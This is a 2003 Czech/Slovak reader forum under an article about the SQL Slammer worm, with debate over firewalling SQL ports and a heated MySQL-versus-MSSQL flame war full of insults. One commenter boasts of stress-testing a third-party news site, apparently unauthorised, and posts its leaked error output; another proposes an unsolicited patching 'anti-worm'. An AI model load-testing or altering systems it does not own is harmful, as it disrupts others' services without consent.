Internet zkolaboval kvůli starší chybě SQL Serveru 2000

Diskuze čtenářů k článku

Radek  |  27. 01. 2003 13:38

oooo s l a m m e r ooooooooooooooooooo  

Zásadní chyba je, že se hned nevyšle anti-červ, který by aplikoval záplaty, nebo minimálně zavíral port který využívá Slammer.

oooooooooooooooo   

OOOOOOOOOOOOOOO

ooooooooooooooooo

oooooooooooooooo

 

 

Souhlasím  |  Nesouhlasím  |  Odpovědět
4ad  |  27. 01. 2003 08:04

Pozeral som zataz SIX-u na Slovensku a cez vikend sa tam nic mimoriadne nedialo.

http://www.six.sk/mrtg/switch.six.sk.a.html

Souhlasím  |  Nesouhlasím  |  Odpovědět
Radek Novak  |  26. 01. 2003 19:57

Je to hoax - co kolabovalo ? Routery, switche, nebo nezabezpečené servery, na kterých hostují stránky?

Během soboty jsem stejně řada jiných lidí vůbec nic nepostřehnul, všechno jelo O.K, svištělo to velmi dobře, dnes v něděli taky.

Vzhledem k tomu, že zpráva se objevila v obou hlavních českých TV po tom, co z Ruska přišla výhrůžka od celkem pochybné firmy, že další útok wormů internet nepřežije (blbost , protože internet není nic kompaktního)  a vzhledem k tomu, že SQL Slammer Evropu celkem nepostihl, nechápu, proč se z toho dělá takový humbuk - no možná, že si to Rusové u našich médií objednali.

(A worm that attacks Microsoft's database software spread through the Internet over the weekend, causing cash machines to stop issuing money, taking most of South Korea offline and slowing down the Internet. CNET News, 26.01.03

 

Souhlasím  |  Nesouhlasím  |  Odpovědět
asd  |  26. 01. 2003 21:50

opravdu kolaboval cely internet vcetne routeru a switchu viz: http://average.matrix.net/Weekly/markR.html nebo treba www.internetpulse.net/24/ (ty linky budou fungovat jen xvili). Problem je ten ze oproti napr. CodeRed ktery fungoval na TCP, tenhle exemplar vyuziva bezstavove UDP, takze misto par bytoveho TCP SYN zacne ihned generovat 400B(?) UDP.....

Souhlasím  |  Nesouhlasím  |  Odpovědět
Martin2  |  26. 01. 2003 19:40

SQL server pristupny z vnejsku necha pouze nesvepravny idiot, bud je ve vnitrni siti nebo, pokud je na stejnem stroji jako web server, ma vypnuty/firewallovny TCP/IP port. Pokud je treba napr. pro replikaci pristup na SQL server z vnejsku, jem pitomec pouziva defaultni port, aby cerv nemel problem s hledanim. (Tim tise predpokladam, ze MS SQL dovede menit port jako treba PotgreSQL, pokud ne, je hovno na kosili Microsoftu). I v pripade, ze se neda port zmenit, neni problem doplnit pravidla stavoveho firewallu, aby akceptoval pouze pozadavky od replikovanych serveru a ostatni konexe rovnou zahazoval, vzdyt to je par jednoduchych pravidel do IPTABLES. Pokud Admin pouziva mozek, system se da zabezpecit aniz by musel denne sledovat jake diry zas MS vygeneroval. Bohuzel, MS dava klikacum pocit, ze dovadou spravovat internetovy server a kdyz dojde na lamani chleba, jde pul inetu do kytek. Ostatne, kdyz je rec o MS SQL, na MNOHO (rekl bych drtivou vetsinu) internetovych aplikaci bohate postacuje PostgreSQL nebo MySQL. Na MySQL bezi napriklad web CTK www.ceskenoviny.cz a ti maji setsakra vysokou navstevnost. Cetnost vypadku MySQL na ceskenoviny.cz je mnohem nizsi nez obligatni "Microsoft OLE DB provider error" ktery je na Zive dennim hostem.

Souhlasím  |  Nesouhlasím  |  Odpovědět
CZ  |  26. 01. 2003 20:25

Hmm, nechci ti nijak kazit radost, ale db servery se využívají i k mnoha jiným věcem, než jenom jako část webových stránek. Například servery, kde se připojují desítky "pohyblivých" uživatelů pomocí nějakého klienta a podobný distribuovaný zpracování. Pokud to má opravdu fungovat pro mobilní usery, nemůžeš to zamčít na IP. Ech co...

Souhlasím  |  Nesouhlasím  |  Odpovědět
Martin2  |  26. 01. 2003 21:09

No to je sice pravda, lec tento zpusob pouziti je pomerne ridky, aby se primo na SQL konektil nekdo z notebooku. V drtive vetsine jsou SQL schovane mimo verejny internet a pouze poskytuji sluzby frontendum. Tudiz mimo nekolika specialnich pripadu muj prispevek plati.

Souhlasím  |  Nesouhlasím  |  Odpovědět
Petr Balas  |  26. 01. 2003 22:07

VPN?

Souhlasím  |  Nesouhlasím  |  Odpovědět
nobody  |  27. 01. 2003 22:34

Ty jses ale idiot, neporovnavej weby ale parametry, teda jestli mysql nejake ma..
MySql je skoro predpotopni databaze bez ulozenych procedur a definovanych funkci, jestli teda vis vubec co to je....

Zive by nejelo urcite vubec na MySql a php.. Naschval vy chytraci co podporujete php a MySql, navrhnete Hlavenkovi ze to udelate, on je dost blby na to aby to podporil!

Jsem si 100% jisty ze by takova aplikace nevydrzelajeden den.. a jsem ochoten se o to vsadit :)

 

Souhlasím  |  Nesouhlasím  |  Odpovědět
Ritchie  |  28. 01. 2003 01:20

Spíše hodnocení tvé inteligence by dopadlo neslavně.
Nevidím důvod, proč by živě nemohl běžet na MySQL/PgSQL + PHP. Takže když mně za práci zaplatíš, klidně jej přepíšu. Obávám se ale, že se v této věci bavíme jen hypoteticky.
Jaké že to vlastnosti jsou použity na živě, které by nešli udělat pomocí MySQL/PgSQL a PHP?

Souhlasím  |  Nesouhlasím  |  Odpovědět
Idiot  |  28. 01. 2003 08:10

Za to tva inteligence je temer u stropu :)

>Nevidím důvod, proč by živě nemohl běžet na MySQL/PgSQL + PHP.
Ja ho treba Ritchie vidim v tom, ze:

- nemas v MySQL ulozene procedury(teda pokud se nechci placat v cecku). Takze se musi psat prasacky sql dotazy primo do kodu
- nevidim v php zpusob cachovani datove vrstvy.. i kdyz ve scriptovacich jazycich bych o nejakych vrstvach radeji nemluvil.
- proto si nedovedu predstavit dotaz v slozitejsi DB strukture s vice daty.
- NEchci uz vubec srovnavat ASP.NET a PHP protoze to je jako srovnavat trabant a mercedes
(pro upresneni php je ten trabant)

atd..

Chces jeste toho slyset vice Ritchie?
Nebo chces si pro zmenu vymenit nick jako stafetu, ted by ti asi sed muj, co?
Celkem me vytaci bezduche utoky vetsinou amateru co si v pehapkach napsali tri radky nebo jednoduchy pub system na kterem jede webik s max tisicovkou navstevniku za dan, ale kteri nemaji ani tucha co to je vubec naprogramovat poradnou aplikaci.

 

Souhlasím  |  Nesouhlasím  |  Odpovědět
Martin2  |  28. 01. 2003 12:47

Podivej se, komiku, na www.ceskenovuiny.cz. Neboj, primarni zpravodajsky server CTK ma setsakra vyssi navstevnost nez nejake Zive. Web CTK jede na PHP a MySQL MNOHEM zpolehliveji nez, Zive, kde jw "MS ADO DB provider error" dennim hostem. Vim, ze MySQL je velice jednoducha databaze, lec ma nejrychlejsi SELECT ze vsech existujicich databazi, (MSSQL s vlozenymi procedurami ani trochu nelepi, je radove pomalejsi, ostatne vysoka rychlost odezev mnohem zatizenejsiho serveru www.ceskenoviny.cz napovida), a SELECT dela odhadem 98% cinnosti DB backendu WWW serveru. Na vytazeni prispevku z jednoduche tabulky zkratka triggery ani transakce potreba nejsou! Tudiz pro pouziti pro WEB je MySQL mnohem vyhodnejsi a vykonnejsi nez enterprise MSSQL. Pouzit predrazeny a MSSQL s nehoraznymi HW pozadavky je stejna idiocie, jako jet na nakup do samoobsluhy nakladni Tatrou nebo pokouset se orat pole Felicii.

Souhlasím  |  Nesouhlasím  |  Odpovědět
Idiot  |  28. 01. 2003 23:11

Aha tak se podivej do auditu magore :). Ja nevim ale ty vase fraze , ze mysql jsou tak uzasne rychle a to jen proto, ze nemaji transakce jsou stejne otrepane jako kecy svedku Jhovovych! Vzdyt to vubec neni pravda!! To je univerzalni odpoved linuxackeho pritroubleho nadsence :). Najoinuj 3 tabulky s cca 50000 zaznamy nekolika podminkama a spust webstress php s mysql a pak ... na asp s mssql a storkou a naaaahle uvidis ... no a ten rozdil prosim zverejni a nedej na pitome rikanky predavane z jednoho pritroubleho linuxaka na druheho.. jsem ochoten tento test s jakymkoliv linuxakem rad podstoupit (tipuju ve prospech asp nejmin tretinu navrch).

Souhlasím  |  Nesouhlasím  |  Odpovědět
Martin2  |  29. 01. 2003 01:22

Komiku, jeste jednou, znovu a lepe. Rec byla o pouziti DB backendu WWW serveru. Netusim, k cemu www server potrebuje joinovat 3 tabulky o 50000 zaznamech, teda spis tusim, k nicemu. Ja nepsal ze, MySQL je uzasne rychla, protoze nepouziva transakce, ale ze ma nejrychlejsi SELECT ze vsech znamych DB serveru a to proto, protoze to je pravda. WWW server prakticky nic jineho nez jednoduchy SELECT nepotrebuje. Jste naprosto zarnym prikladem, jak vznikaji omezeni MSmani. Nejspis jste zacal jako hrac na W95, pak jste na skole matlal ASPcka a ted to delate profesionalne na MS IIS, MSSQL za pomoci MS Interdev na MSWindows a kecy okolo pisete v MSOffice. Ja mel stesti, ze jsem na skole i nyni v zamestani pracoval s alternativami, tudiz mam nyni nadhled a dovedu si vybrat nejvyhodnejsi reseni. (jsem programator, momentalne bankovnich aplikaci). Pokud budu stavet maly web server, pak pouziju Linux+PHP+MySQL, reseni spolehlive, cena nulova, HW naroky minimalni, pokud budu chtit o chlup slozitejsi reseni pak Linux+Apache+JSP+Postgres a vlozene procedury (toto reseni spolehlive pokryje naroky vsech www severu v cesku, snad s vyjimkou seznamu, ten pouziva staticke stranky generovane PHP), pokud jeste narocnejsi, pak linux cluster+Apache+JSP+Postgres, pokud potrebuju jeste vetsi vykon pak Postgres nahradim MSSQL nebo Oraclem, (MSSQL je vykonove mezi Oraclem a Postgresem), pokud nebudou stihat JSP servlety, pro kriticke sekce napisu Apache modul v C++. Pokud bude reseni potreba postavit na MS, tak tam to IIS narvu a zily mi to trhat nebude, to uz bude boj admina, udrzet ten bazmek v chodu. Osobne bych se ale MS branil, zavislost na MS vede k pasti nekompatibit a nasledne nutnosti pravidelnych drahych upgradu. Je zkratka blbost utracet za MSSQL enterprise server na web kde tutez praci zvlada lepe a rychleji jednoducha MySQL, stejne jako je blbost rvat na tentyz server Oracle. Vyvojar s mozkem v hlave na SQL pristupuje pres abstraktni vrstvu, co je dole za server je jeho skriptum jedno. Vas srandovni navrh na PHPxASP contest me veru pobavil, z toho jsem uz vyrost. Jinak pro vasi informaci, ASP3.0 je o chlup rychlejsi nez PHP3.x.x, PHP 4.x.x s vykonnym jadrem Zend a Zend chache je radove rychlejsi nez ASP3.0 a ASPckum natrhne prdel, kdy se mu zlibi. (Tim mam na mysli rychlost interpretace kodu, samozrejme ne binarni ActiveX komponenty, zalezi taky na versi ASP, pod oznacenim ASP3.0 se schovavaji odlisne softy menici se s service packem) APS.NET je naopak rychlejsi nez PHP4.x.x, uz jemon proto ze je kompilovane (i kdyz ta vykonnostni propast je mensi nez mezi ASP3.0 a PHP4.x.x), je dokonce znatelne rychlejsi nez JSP. Na druhou stranu JRE1.4.1-01 ma vylepsenou podporu Java Beans, mozna tomu je nyni naopak. V databazove oblasti bude MySQL mit silne navrch v SELECTech, v ostatnich oblastech bude znatelne ztracet. Zalezi ostatne na HW, na Pentiu 120 pobije MySQL MSSQL ve vsech smerech, naopak na velmi silnem HW (multiprocessing + SCSI) MSSQL vyhraje i v tech SELECTech. Tudiz soudny clovek nemuze rict PHP+MySQL je rychlejsi/pomalejsi nes ASP+MSSQL, zalezi pripad od pripadu na pouziti a kontextu. Doporucuji vam odlozit MS fanatismus a porozhlidnout se po alternativach. Nemusite je pouzivat, ale je velice dulezite o nich vedet. protoze pokud o existenci vyhodnejsi reseni nevite, nemuzete ho pouzit. Cca pred pul rokem jsem ukoncil projekt pro jeden cesky obchodni retezec, reseni bylo napsano v C++ pro Linuxu+PostgreSQL. To reseni zkratka vykonnejsi DB nepotrebovalo. Jak by se asi tvarilo vedeni onoho obchodniho retezce, kdybyste jim nabidl reseni na w2k server a MSSQL pro nenarocny sber dat a tim je nutil k nakupu W2k server a MSSQL na kazdou pobocku, kdyz ja jim nabidl reseni na Linuxu a Postgresu zadara? Spravne, hnali by vas svinskym krokem. A o tom to vsecko je, ja pouzivam reseni, ktera v danem pripade povazuju za vyhodne a je mi srdecne jedno, jestli pochazi od Pavla nebo Havla, mam nadhled a znalosti, ktere mi umoznuji se rozhodnout a sva rozhodnuti obhajit. Vas postoj s MS na vecne casy a nikdy jinak vas spolehlive zavede do prdele, je to jen otazka casu.

Souhlasím  |  Nesouhlasím  |  Odpovědět
Idiot  |  29. 01. 2003 23:57

takze male proklepnuti vaseho oblibeneho http://www.ceskenoviny.cz po 3 sekundach zateze !!! vysledek:
(defaultka je v html tak ta byla v pohode)
 PHP 4.x.x s vykonnym jadrem Zend a Zend :))) ale asi to bezi na pentiu 120.. snad sam tomu neverite:)

Warning: mysql_pconnect() [function.mysql-pconnect]: Host 'belinda-local' is blocked because of many connection errors. Unblock with 'mysqladmin flush-hosts' in /var/myconnect/myconnect.inc4 on line 7

Warning: mysql_select_db() [function.mysql-select-db]: Can't connect to local MySQL server through socket '/tmp/mysql.sock' (2) in /home/httpd/htdocs/inc/library.inc4 on line 75

Warning: mysql_select_db() [function.mysql-select-db]: A link to the server could not be established in /home/httpd/htdocs/inc/library.inc4 on line 75

Warning: mysql_query() [function.mysql-query]: Can't connect to local MySQL server through socket '/tmp/mysql.sock' (2) in /home/httpd/htdocs/view-id.php4 on line 88

Warning: mysql_query() [function.mysql-query]: A link to the server could not be established in /home/httpd/htdocs/view-id.php4 on line 88

Chyba při zjišťování záznamu s id = (vid = 108299, tid = , pid = )

SELECT *, TIME_FORMAT(v.cas, '%k:%i') AS cas, DATE_FORMAT(v.datum, '%e.%c.') AS datum FROM vyskyty AS v, zpravy AS z WHERE (vid = '108299') AND (v.id = z.id) LIMIT 1
2002: Can't connect to local MySQL server through socket '/tmp/mysql.sock' (2)

 
takze male shrnuti

- Lehce zatizene serevery: php asp uplne staci to souhlasim

- Zatizene servery:
     (dle vas)Apache + moduly v C++ //celkem dost velka pracnost
     (dle.mne)ASP.NET //pohodlna prace daleko rychlejsi vyvoj zadne problemy s thready v C++

    

>>reseni bylo napsano v C++ pro Linuxu+PostgreSQL. To reseni zkratka vykonnejsi DB nepotrebovalo. Jak by se asi tvarilo vedeni onoho obchodniho retezce, kdybyste jim nabidl reseni na w2k server a MSSQL pro nenarocny sber dat a tim je nutil k nakupu W2k server a MSSQL na kazdou pobocku, kdyz ja jim nabidl reseni na Linuxu a Postgresu zadara?

jen tak na okraj kolik stal vas vyvoj?

 

kolik by stal vyvoj

Souhlasím  |  Nesouhlasím  |  Odpovědět
Idiot  |  30. 01. 2003 00:03

takze male proklepnuti vaseho oblibeneho http://www.ceskenoviny.cz po 3 sekundach zateze !!! vysledek:
(defaultka je v html tak ta byla v pohode)
 PHP 4.x.x s vykonnym jadrem Zend a Zend :))) ale asi to bezi na pentiu 120.. snad sam tomu neverite:)

Warning: mysql_pconnect() [function.mysql-pconnect]: Host 'belinda-local' is blocked because of many connection errors. Unblock with 'mysqladmin flush-hosts' in /var/myconnect/myconnect.inc4 on line 7

Warning: mysql_select_db() [function.mysql-select-db]: Can't connect to local MySQL server through socket '/tmp/mysql.sock' (2) in /home/httpd/htdocs/inc/library.inc4 on line 75

Warning: mysql_select_db() [function.mysql-select-db]: A link to the server could not be established in /home/httpd/htdocs/inc/library.inc4 on line 75

Warning: mysql_query() [function.mysql-query]: Can't connect to local MySQL server through socket '/tmp/mysql.sock' (2) in /home/httpd/htdocs/view-id.php4 on line 88

Warning: mysql_query() [function.mysql-query]: A link to the server could not be established in /home/httpd/htdocs/view-id.php4 on line 88

Chyba při zjišťování záznamu s id = (vid = 108299, tid = , pid = )

SELECT *, TIME_FORMAT(v.cas, '%k:%i') AS cas, DATE_FORMAT(v.datum, '%e.%c.') AS datum FROM vyskyty AS v, zpravy AS z WHERE (vid = '108299') AND (v.id = z.id) LIMIT 1
2002: Can't connect to local MySQL server through socket '/tmp/mysql.sock' (2)

 
takze male shrnuti

- Lehce zatizene serevery: php asp uplne staci to souhlasim

- Zatizene servery:
     (dle vas)Apache + moduly v C++ //celkem dost velka pracnost
     (dle.mne)ASP.NET //pohodlna prace daleko rychlejsi vyvoj zadne problemy s thready v C++ a jine drbacky v cecku
      neuhradi jen tak nahodou rozdil v cene ve vyvoji sqlserver i win2000?
    

>>reseni bylo napsano v C++ pro Linuxu+PostgreSQL. To reseni zkratka vykonnejsi DB nepotrebovalo. Jak by se asi tvarilo vedeni onoho obchodniho retezce, kdybyste jim nabidl reseni na w2k server a MSSQL pro nenarocny sber dat a tim je nutil k nakupu W2k server a MSSQL na kazdou pobocku, kdyz ja jim nabidl reseni na Linuxu a Postgresu zadara?

jen tak na okraj kolik stal vas vyvoj, teda jestli to nebyla nejaka sranda s nekolika scripty i kdyz bych chtel videt ten obchodni retezec ktery potreboval tak rychlou aplikaci..  ??

 

 

Souhlasím  |  Nesouhlasím  |  Odpovědět
Martin2  |  30. 01. 2003 13:00

Srandisto, ceskenoviny bezi MNOHEM spolehliveji nezs ZIVE, to je fakt, ze to odmitlo DoS na tom nic nemeni.
Pokud neumite cist, tak jeste jednou, pro stredne zatizene weby jsem psal Linux+Apache+JSP, pokud nevite co to je JSP, pak vezte, ze to znamena Java Server Pages, ASP.NET je kopie JSP postavena na .NET frameworku. Jen je na tom z hlediska pouzitelnosti krapet hur, pro ASP.NET neexistuje nic jako CPAN nebo PEAR, kazdou hovadinu musi vyvojar psat sam znova. Ta aplikace, co jsem psal byla vyvijena pul roku v C++ v gcc, (konkurence z Belgie toto pise uz druhym rokem), ta rychlost vyvoje byla tak nizka jenom proto, ze jsem mohl siroce pouzivat volny LGPL kod, pod wokny nic takoveho neexistuje. (Mluvim o kodu, ne o smesnych binarnich komponentach do borlandu nebo .NET, do kterych nevidim a nemuzu jim verit, timpadem je nemuzu pouzit) Opakuji, ja jsem programator, ne matlal webovych skriptu, ta aplikace nemela nic spolecneho s webem ale se sberem a distribuci informaci po WAN siti mezi pobockami. Zkratka a dobre, na male WWW zateze linux a PHP, (dobra alternativa je mod_perl), protoze to je levne a existuje pro to SPOUSTA hotoveho pouzitelneho kodu, na velke zateze linux+JSP, protoze to je skalovatelne a nehrozi do budoucna past nekompatibilit. Java je open source a Linux klidne muzu nahradit BSD, AIX etc.. A na velmi silne zatizene weby Linux cluster, tak funguje Google. MS se da samozrejme pouzit, jenze neni skalovatelny, na male weby je to moc nenazrane a drahe, velke weby nestiha. Skratka s felicii se do vytahu nevejdu a orat s ni taky nepujde. Jo a PHP4.x.x s vykonnym jadrem ZEND na P120 samozrejme beha bez sebemensich problemu, da se pouzit klidne na 486DX/66. Je videt ze jste MS uz tak zblbly, ze co nema aspon 1GHz povazujete za nepouzitelne. Znam jeden z prestiznich ustavu Akademie Ved, kde od roku 92 DODNES bezproblemove poskytuje veskere internetove sluzby (mail,staticka www prezentace, vzdalene UNIX ucty) staricky SCO OpenServer postaveny na 486SX/25 pro 150 uzivatelu. Tenkrat v roce 92 to bylo delo, 1GB SCSI disk stal 95000, mno a od te doby zkratka funguje. Opakuji, vase MS omezenost vam muze prinest znacne neprijemnosti. Kdyz napisete aplikaci na .NET, tak pojede na w2k na intelu 1 Ghz vyse na IIS, tim veskere moznosti hasnou. Pokud budete chtit aplikaci portovat na vykonnejsi HW, treba SUN nabo IBM zSeries, smula, linux, GCC, PHP, PERL, Java - zadny problem. Pokud budete potrebovat cluster, linux zde drtive vede, (Beowulf, MOSIX) pokud budete potrebovat upravit na reseni urcite speciality, napr vylepsit Apache o nove vlastnosti, u open source trivka, u MS nemozne atd atd... Zkratka a dobre, kvuli tomu, ze se vam momentalne zda jednodussi a rychlejsi psat v ASP, si uzavirate cestu, muzete jenom tam, kam vas MS pusti.

Souhlasím  |  Nesouhlasím  |  Odpovědět
Martin2  |  30. 01. 2003 13:17


Napsal jsem dlouhou odpoved a dosahljsem pouze nasledujiciho:
Active Server Pages error 'ASP 0113'

Script timed out

/mod_Forum/Executor.asp

The maximum amount of time for a script to execute was exceeded. You can change this limit by specifying a new value for the property Server.ScriptTimeout or by changing the value in the IIS administration tools.


<br>
Znovu to psat nebudu, ostatne je to vase valka, pokud chcete byt omezen na to, co vam Gates dovoli, vas vyber, jenom upozornuji, ze hlediska budouciho to neni to prave. V letech 80tych dominovaly VAXy a PDP stejne jako dnes MS, znami z US mi popsali par chudaku, co se VAXum upsali natolik, ze po skonceni jejich ery byli naprosto v prdeli.

Souhlasím  |  Nesouhlasím  |  Odpovědět
Idiot  |  01. 02. 2003 08:50

jen tak na okraj(>Srandisto, ceskenoviny bezi MNOHEM spolehliveji nezs ZIVE, to je fakt, ze to odmitlo DoS na tom nic nemeni.), mozna mate pravdu.. Pingnete si ale na vsechny servery Zive. Zjistite ze jedou vsechny na jednom stroji a pochybuji, ze jsou v clusteru. Ze Cpress je skrt a setri, za to asp, nemuze. Budu to brat na preskacku.

Kdyz se nekdo nauci C++ a dobre ho pochopi tak se nemusi bat, ze bude mit problemy se naucit celkem svizne neco noveho.

> na velmi silne zatizene weby Linux cluster, tak funguje Google. MS se da samozrejme pouzit, jenze neni skalovatelny, na male weby je to moc nenazrane a drahe, velke weby nestiha.
Kde jste dosel k tomu, ze MS loadbalancing nestiha? Asi nevite, ze moznosti nastaveni podle pouziti, jestli to nekdo neumi pouzit tak je to problem. Na tom v cesku dost velke firmy jako je pCeska pojistovna a CS atd. stejne jako cela jejich sit a asi taky se rozhodovali. Navic application server umi pohodlne distribuaovat komponenty na jednotlive nody a sledovat jejich momentalni stav. Celkem by me zajimalo jak na vasem clusteru udrzujete globalni stavy?

>Ta aplikace, co jsem psal byla vyvijena pul roku v C++ v gcc, (konkurence z Belgie toto pise uz druhym rokem), ta rychlost vyvoje byla tak nizka jenom proto, ze jsem mohl siroce pouzivat volny LGPL kod, pod wokny nic takoveho neexistuje. (Mluvim o kodu, ne o smesnych binarnich komponentach do borlandu nebo .NET, do kterych nevidim a nemuzu jim verit, timpadem je nemuzu pouzit)

prosim vas co to placate o smesnych binarnich komponentach? Jestli jste slysel neco o dedicnosti tak vezte, ze jestli je komponenta spravne napsana tak si ji muzete upravit jak chcete. Java je myslim toho zarnym prikladem. A v pripade ze opravdu potrebujete zdrojaky tak treba pro .NET je jich opravdu dost.

>linux+JSP, protoze to je skalovatelne a nehrozi do budoucna past nekompatibilit.
O jake skalovatelnosti linux+JSP , mel jsme moznost testovat takovou kombinaci a nejak mi skalovatelna nepripadala. V jave se bezesporu nadherne programuje, ale to je vse, bohuzel je hodne pomala, kazdy kdo v ni programoval mi da za pravdu.

Dale portovatelnost napr. Frameworku na jine systemy bych si nebyl tak jisty: http://www.computerworld.com/softwaretopics/os/windows/story/0,10801,58741,00.html

Ale jinak ve spouste veci s vami souhlasim.

Souhlasím  |  Nesouhlasím  |  Odpovědět
XP Master  |  26. 01. 2003 18:10

Mně jde Živě bez problémů, asi jste hned u linky do zahraničí. Posílám traceroute z Francie (jsem u poskytovatele www.free.fr) :

  1    80 ms    80 ms   161 ms  192.168.254.254
  2    70 ms    80 ms    80 ms  p19-6k-1-a9.routers.proxad.net [212.27.32.180]
  3    80 ms    91 ms    80 ms  cbv-12x-1-a6.routers.proxad.net [213.228.3.5]
  4    70 ms    80 ms    80 ms  prs-b1-geth6-2.telia.net [213.248.70.253]
  5    80 ms    80 ms    90 ms  prs-bb2-pos0-3-0.telia.net [213.248.70.9]
  6    80 ms   101 ms    80 ms  ldn-bb2-pos0-2-0.telia.net [213.248.64.165]
  7    90 ms    91 ms    90 ms  ldn-b1-pos11-0.telia.net [213.248.74.14]
  8    80 ms   101 ms    90 ms  core2.uk1.concert.net [195.66.224.108]
  9    80 ms    81 ms    90 ms  t2c1-ge6-2.uk-lon2.concert.net [166.49.208.241]

 10    90 ms    90 ms    90 ms  166-49-208-194.concert.net [166.49.208.194]
 11   110 ms   120 ms   110 ms  166-49-222-162.concert.net [166.49.222.162]
 12   120 ms   100 ms   140 ms  gwb-bb10.gts.cz [62.168.24.66]
 13   110 ms   120 ms   110 ms  kq2-gts2.gts.cz [195.39.108.118]
 14   110 ms   121 ms   120 ms  r1.brno-kq2.cz.gts.cz [193.86.72.182]
 15   110 ms   120 ms   120 ms  r7.brno-kq2.cz.gts.cz [193.86.70.246]
 16   121 ms   110 ms   110 ms  www.zive.cz [193.86.103.34]

Souhlasím  |  Nesouhlasím  |  Odpovědět
Inkvizitor  |  26. 01. 2003 16:44

Zatím podle reakcí to vypadá, že si nikdo z Vás nevšimnul, že jsou přetíženy i servery takových firem jako je například Western Digital, ASUS, HP a podobně.

Jak je tohle možné?

Pokud někdo zná odpověď odpovězte prosím!!!

Díky

Souhlasím  |  Nesouhlasím  |  Odpovědět
Borek  |  26. 01. 2003 18:48

Asi v těch Windows nestačí také jen kilikat, ale chce to umět přemýšlet a mít zájem o svoje vlastní vzdělávání, nové informace apod. Takže asi ušetřili na nákladech. Bohužel v tomto případě nemohou poslat účet Microsoftu, ale přemýšlet "kde udělali soudruzi z NDR chybu".

Souhlasím  |  Nesouhlasím  |  Odpovědět
Ritchie  |  26. 01. 2003 15:22

Jaké je právní hodnocení celé události?

Souhlasím  |  Nesouhlasím  |  Odpovědět
Lachtan Gaston  |  26. 01. 2003 09:05

Přiznám se že nechápu. Pokud provozuju WWW server, ktery potřebuje SQL server, tak ten SQL snad může běžet na jiném stroji, ktery není z internetu vidět, ne ? A když už jsem na tom tak špatně ze obojí musím mít na jednom stroji, tak se nedá zakázat, aby byl port SQL serveru přístupný zvenku ale jen jako localhost ?

Souhlasím  |  Nesouhlasím  |  Odpovědět
Mem  |  26. 01. 2003 13:30

Zakazat se to da samozrejme firewallem, ale v nekterych situacich je potreba nechat tyto porty otevrene (treba kvuli replikaci databazi na ruznych serverech), ale i tak by se mela dat omezit na firewallu IP adresa, ktera se muze na port pripojit.

Souhlasím  |  Nesouhlasím  |  Odpovědět
Ritchie  |  26. 01. 2003 15:02

Ale proč to ti "admini" neudělali? Ač se amatérsky (ve významu koníček) starám jen o svůj počítač, nenecháván otevřené porty nikam jinam, než je nezbytně nutné, resp. než kam přímo chci.

Souhlasím  |  Nesouhlasím  |  Odpovědět
Borek  |  26. 01. 2003 18:46

Položte si otázku kolik nějaký admin v Computer Pressu bere a až se to dozvíte tak bude vědět proč záplata nebyla instalována ...

Souhlasím  |  Nesouhlasím  |  Odpovědět
Barbar  |  26. 01. 2003 08:32

Podle mě servery co jedou na Serveru 2000 jsou pěkní menti a jenom jim to patří - tam prostě pořád a vždy budou chyby!!! Kdyby tam měli normální Linux nebo Unix, mohli by být v pohodě!!!

Souhlasím  |  Nesouhlasím  |  Odpovědět
Paja  |  26. 01. 2003 09:21

Umis cist? Asi ne... Tudiz nema smysl ti vysvetlovat, proc jses "Ment" ty...

Souhlasím  |  Nesouhlasím  |  Odpovědět
Julo Kováč  |  26. 01. 2003 11:04

barbare

musim uznat tvoj spravny nazor

mam sice nejaky zalozny u*like SQL

objavil si Ameriku

SLAVA

Souhlasím  |  Nesouhlasím  |  Odpovědět
Deflorace hymenu  |  26. 01. 2003 19:21


Linux SQL Server, to musi bejt nasleh.
Tvuj prispevek me fakt uchvatil neskonalou inteligenci ...

Souhlasím  |  Nesouhlasím  |  Odpovědět
Julo Kováč  |  26. 01. 2003 07:36

Stale neviem aka je situacia u Vas v Cechach

ale na Slovensku sa asi nic nestalo

asi nikto nepouziva MS SQLServer2000

skoda ze Vasa prva vyzva prisla az o 16.10 25.01.2003

lebo od nasho SQL som odchadzal o 16.00

Souhlasím  |  Nesouhlasím  |  Odpovědět
surfer  |  26. 01. 2003 14:18

..... NIC NESTALO ?????????????????????????? sakra tak ty si to asi prespal - dialo sa to od cca 06.15 do 10.00 napr www.sme.sk nejde este doteraz - pouzivaju SQL a ocividne ich ten cerv napadol, a tym aj oni prispeli k zahlteniu inetu u nas . Siete GTS, EuroWebu a Sanetu (podla grafu v SIX-e) v tomto case prenasali takmer dvojnasobny traffic ako je priemer ! GTS dokonca az 5 nasobny !!! Takze v SR asi dost ludi pouziva SQL a vela ho ma stale (uz asi nie) deravy . Mali provideri ktori maju klientov vacsinou dialupistov a 1-2 servre samozrejme nezaznamenali ziadny zvyseny traffic ...

Ak neveris tak sa pozri na www.six.sk a tam daj PREHLAD ZATAZE LINIEK a vsimni si prenasany traffic vcera  medzi 06.00 a 10.00 a potom hovor ze sa nic nestalo ! 

Souhlasím  |  Nesouhlasím  |  Odpovědět
Julo Kováč  |  27. 01. 2003 06:18

cau surfer

posli mi link na ping, traceroute a mtrg pre "slepcov"

a posli to patentovemu uradu na Kamcatku

 

Souhlasím  |  Nesouhlasím  |  Odpovědět
jayjay  |  26. 01. 2003 00:32

Microsoft made

:o)

no comment
no more to say :o)

Souhlasím  |  Nesouhlasím  |  Odpovědět
Idiot  |  27. 01. 2003 22:36

Ano at zije MySql php a feelinux... neni na svete nic lepsiho!! Krome Jehovy

S pozdravem
Svedci Jehovovi

Souhlasím  |  Nesouhlasím  |  Odpovědět
oval  |  25. 01. 2003 22:26

Uznavam, ze neco pravdy na tom je, kdyz se dva hadaji, nepozna se kdo je debil.

Souhlasím  |  Nesouhlasím  |  Odpovědět
viscidhad  |  25. 01. 2003 21:05

Tak ja som dnes okolo obeda surfoval po X roznych strankach a jedina, ktora mi nechodila (resp. isla uplne pomaly a s vypadkami), bola www.zive.cz. Nie je tento clanok nejakou vyhovorkou? Zoznam adries, ktore mi sli, na poziadanie rozpisem (teda tie, na ktore si spomeniem). Boli to sk, cz aj com a vsetky sli rychlo, ako obvykle.

Souhlasím  |  Nesouhlasím  |  Odpovědět
Petr  |  25. 01. 2003 21:17

No vidis, jak se mas....tady v Brne na kolejich jsme byli celej den v pr....

Souhlasím  |  Nesouhlasím  |  Odpovědět
Xaver  |  27. 01. 2003 08:57

Bohuzel, chyba byla na strane rektoratu a stavarny

Souhlasím  |  Nesouhlasím  |  Odpovědět
Tomáš Holčík  |  25. 01. 2003 21:20

Přečtete si cokoli na světovém Internetu, bylo to po celém světě. my si zprávy třeba na News.com nevymýšlíme :)

jinak myslím, že se tady plete několik katastrof dohromady:


